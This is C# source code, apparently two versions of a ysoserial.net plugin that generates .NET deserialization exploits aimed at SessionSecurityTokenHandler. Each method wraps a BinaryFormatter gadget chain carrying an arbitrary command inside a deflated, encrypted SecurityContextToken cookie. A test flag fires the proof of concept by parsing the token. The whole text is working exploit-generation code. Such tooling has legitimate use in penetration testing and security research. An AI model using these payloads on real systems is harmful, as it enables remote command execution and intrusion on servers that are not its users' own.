public object Run(string[] args)
{
List <string> extra;
try
{
extra = options.Parse(args);
}
catch (OptionException e)
{
Console.Write("ysoserial: ");
Console.WriteLine(e.Message);
Console.WriteLine("Try 'ysoserial --help' for more information.");
System.Environment.Exit(-1);
}
String payloadValue = "";
string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'>
<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
urn:unique-id:securitycontext:1337
</Identifier>
<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";
if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
{
Console.Write("ysoserial: ");
Console.WriteLine("Incorrect plugin mode/arguments combination");
Console.WriteLine("Try 'ysoserial --help' for more information.");
System.Environment.Exit(-1);
}
byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();
byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);
byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));
if (test)
{
// PoC on how it works in practice
try
{
XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
mySessionSecurityTokenHandler.ReadToken(tokenXML);
}
catch (Exception e)
{
// there will be an error!
}
}
return(payload);
}
public object Run(string[] args)
{
InputArgs inputArgs = new InputArgs();
List <string> extra;
try
{
extra = options.Parse(args);
inputArgs.CmdFullString = command;
inputArgs.Minify = minify;
inputArgs.UseSimpleType = useSimpleType;
inputArgs.Test = test;
}
catch (OptionException e)
{
Console.Write("ysoserial: ");
Console.WriteLine(e.Message);
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
String payloadValue = "";
string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
urn:unique-id:securitycontext:1
</Identifier>
<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";
if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
{
Console.Write("ysoserial: ");
Console.WriteLine("Incorrect plugin mode/arguments combination");
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();
byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);
byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));
if (test)
{
// PoC on how it works in practice
try
{
XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
mySessionSecurityTokenHandler.ReadToken(tokenXML);
}
catch
{
// there will be an error!
}
}
if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
return(payload);
}